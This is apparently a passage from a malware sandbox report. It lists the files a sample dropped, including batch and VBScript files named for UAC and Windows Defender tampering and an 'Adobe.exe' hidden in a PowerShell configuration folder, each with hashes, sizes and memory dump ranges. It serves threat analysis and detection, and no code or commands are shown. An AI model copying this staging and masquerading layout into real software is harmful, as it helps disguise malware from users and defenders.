2ce7fd3b4a749fb3e0be6aa7d7a2c78d2d95ffe0

SHA256
1c1b901ee6f26266f2a6b0319b79ac2480fa646fc4e411f0b9f9d284dc446e6d

SHA512
38667b3cf4b336d71539f662105b569e6626fcb4c8214eac88a8a1c18db6053c07fc6ecfe4c002189cd78fc64212dc40df7f8600874b85de0c5231ad55a064a6

Download Submit
C:\ProgramData\extracted\file_2.zip

Filesize
814KB

MD5
bcfb7f39718cfd006e4aed81677c5ce6

SHA1
7003fc934d0c3a3e5746b157971422ca2c222c3f

SHA256
f3087ab6ee1162eeed6b7b9f5757eea66c5012c7421592495937aee96fcca212

SHA512
9e2b0a55e892917051e24a22fd5774745a4b59a085da64af2326f279aa9058da6e1cf2594b99cd690c44730cc13128b51549d6e19d3446b0afef74ddba6b5601

Download Submit
C:\ProgramData\extracted\file_3.zip

Filesize
814KB

MD5
9c9e2760a7aa347f88d811e6dc6fa1e0

SHA1
d43413903d00d0d5f72db3ddcf4f4431f34757c9

SHA256
b90316e305b1e6d2e1865339dee7ffd427887c4af37e7dd5d51fec3237429cde

SHA512
77930f4f4e1442f32506b4f2123f7efd296b01ee570f0f94d7189c1b2190e77d91125daf34472a743647208d467753b4cc5241d2504568403e8eb9aef84f1cb6

Download Submit
C:\ProgramData\extracted\file_4.zip

Filesize
814KB

MD5
36503c4a6f4ef96de8edb0e6a37bd416

SHA1
28b878aa69fd722ee4e631d9467adf75c64a232c

SHA256
b982f3c450eadce6f2c0017f02f4a0c92b81bbb67075cb9628cb6adb51403314

SHA512
cdb2f0d74eaad4b19bf6b58448368f04ef0f7dadd19c2d68c31547f9fe38c723dbdd81fb8726fe447845f9645d958c387e2ce577a629a5a4365ad4b6559e24a9

Download Submit
C:\ProgramData\extracted\file_5.zip

Filesize
814KB

MD5
6cb625137943a5cb2ff9a42fdd98ab87

SHA1
29eb39eb180dba7c3e7d975c5de3d01a90a2dd73

SHA256
d11f2efd6899e05f360c3205ba7451847faf479b4f2749c2afef9d87e43bd9be

SHA512
5181743b69a508bd7ca52c16a0f57e1b3428205b1f21623908c5c1bbaf9ebea377802a0fab5730b3236ad9349b8ead45858072afcce451842e294940ca90a8cc

Download Submit
C:\ProgramData\extracted\file_6.zip

Filesize
814KB

MD5
b7194aa2a39fa246856c4e08da206650

SHA1
0371b399624546ceee5301eb431b5c0d0cc07062

SHA256
9c05ab822a0d50ff1e316a845a1a59637c20094c51d92e428c4aa31f6ab57e86

SHA512
2a781154a2150cee237d0530351b63cb472fadeb7ed4e9fe234fcde121e544eb882446042c74fa3acce2ac69a23009225a7a5d0d332601b20e718ace0f120d8d

Download Submit
C:\ProgramData\extracted\file_7.zip

Filesize
2.3MB

MD5
f14fe008e9c02be1121851a65ddd819c

SHA1
2e1e20e6e9128ef4d2ff6f506e98718fc8a6cc2c

SHA256
8e74cc755da6554162e11bcf6e8f363ab4ec76158ba1cb36956147c4c88edbf1

SHA512
a615e0856cefd62ae13e67c3c1a3b4f408abc9e66b3b534ac0273074aae7de4454fb394e3b9e058449afc129406be9c36d96076c7f7cab29cca034987d7239c1

Download Submit
C:\ProgramData\file.bin

Filesize
2.3MB

MD5
70fc649e1636c2705138783ee5495ad9

SHA1
fd66954bd03d7549dbc337f7d4939a3c1d57d0f2

SHA256
711a49c3f419fb284eeca6b7ad9e52f5471562a760f269e32d1f930eb50750fe

SHA512
19c257d12acebc4be39daa483df237e917fb09b26e62e4051437029df28a3ffe738b52573d6f3ba13b770884be2f18b66fc1b85109209fe2e91fbceeb37753af

Download Submit
C:\ProgramData\file.bin

Filesize
2.0MB

MD5
c439fa38d73b7548100c3ef8b30ae5f8

SHA1
ab3f05798c93049c0a0dabb0996cb5ce2d4f21a0

SHA256
a9130c4d7571821a0bbd7731e329bbb3b3fc0da57c1170f392db84d8ffa76b7c

SHA512
4371aee58d3a8a1c58b463e02c9ae07d3483b30766af35eba103a3ff47cd9f3be80d5c52efc91fe9d53c4209dc9772f1f87c72bedc6c3043dc841f68d4dc94f1

Download Submit
C:\ProgramData\main.bat

Filesize
383B

MD5
564689fbb804cae85e189fa356bdffab

SHA1
032abc812bd5979f8e4d89c9a9ebc318cab4faee

SHA256
a74020b5c6eeb0444ba3de36d1cb37b578107d3fa78acfa5110eb5b1d06aaa2c

SHA512
4b4aef287663c466acd360047c107c807e50efa5e8eee12bf196209df5d5e5412dbdd4b1ae0c0bec9f6b4dfc41a6429a864d94280e3f2087e9a6fb3f4e2cc62a

Download Submit
C:\ProgramData\main.bat

Filesize
389B

MD5
d9cf681686547265496d12488ea5ff37

SHA1
e62e3980995d3799228ee1806f0c1b21c985fb56

SHA256
25473e23f350ec5ba71151914e51c4511548917ca0304ee4de57f0ddb139b8a6

SHA512
8bb88c8a68a0938586424adf72f83bcec235b7d0218449d98730496cc902f4f0a2b1ce2638158be299067605455fb3ead5da9afd68c547fdde6021d31b655b33

Download Submit
C:\ProgramData\wu10.2run.vbs

Filesize
138B

MD5
5a14fa9448a36120fa13e30c1c27cea1

SHA1
d9ee005ff4638392b77541a9ceddbf17df53ab82

SHA256
9371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73

SHA512
8f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f

Download Submit
C:\ProgramData\wu10.delete.bat

Filesize
255B

MD5
ee0996325569f1a4739509708717f8f3

SHA1
3514f1e94cb2f745ed8ff84875fd2d90a9e68bc7

SHA256
7631ab00b4b6868f57e9ed5e80bc5b12457ea912759490cbea95101f7918844a

SHA512
6b6a66ff69e4945328a868a31ef07cac425a1372c77e9cd090d5637d9686555506ce851d72473263d522bef07a9ba2bd39e59cc50f9218588dd0e00021068f4d

Download Submit
C:\ProgramData\wu10.run.vbs

Filesize
131B

MD5
9acf11d00161e3f209c06e4577eb42c6

SHA1
bed9c68c145ce8bdf7f3d60d374891fd57e72bb1

SHA256
17432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b

SHA512
271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa

Download Submit
C:\ProgramData\wu10.uac.bat

Filesize
366B

MD5
408e11f699d802ea56fabac297802c5e

SHA1
c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f

SHA256
1e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4

SHA512
e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126

Download Submit
C:\ProgramData\wu10.wdcloud.bat

Filesize
1KB

MD5
c830fde2d469ea25922346b9166da248

SHA1
8dc4fa362b2f79b5294265981256e623553172f9

SHA256
59ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1

SHA512
a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF1FF.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF378.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe

Filesize
6.2MB

MD5
f29f5feaf2450576bf14ca53c90d0059

SHA1
7262f9605fdd224341aa01a3b5912c09171bfcdc

SHA256
18c282c1f2bbc302d317a2f4037072355910f3c3425f446a8a8692652a175520

SHA512
14dfa735b3e7fb1572122c43625be1e61b8c28b1c08cacfb7bd55172e8d2b8db6afa07b4e5822bbf90d9a5f34e368fe67b440779a1d0a01b71f5cb897803b25c

Download Submit
\Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp

Filesize
2.5MB

MD5
7b493e07a8a18509ad2e3fcb4a7e5fa9

SHA1
9f9b9e80000d1e5311ad66a8ee78df9ecbedde9c

SHA256
fee6096ebb65358593028523d91e380be7cdd9d1ff0c1da1aeff06b510ebb9da

SHA512
3dcb03337504bf41376f1ee3c6bf87a02704ab95befa965beae314d1f405bed5617ff25c7ba787507a726e5684ad6b8019e80b9e191b8b5a6b7bf2b9f799533a

Download Submit
memory/1764-9-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/1764-62-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/2368-64-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/2368-2-0x0000000000401000-0x00000000004A9000-memory.dmp

Filesize
672KB

Download
memory/2368-0-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/2720-126-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/2756-40-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/2756-128-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download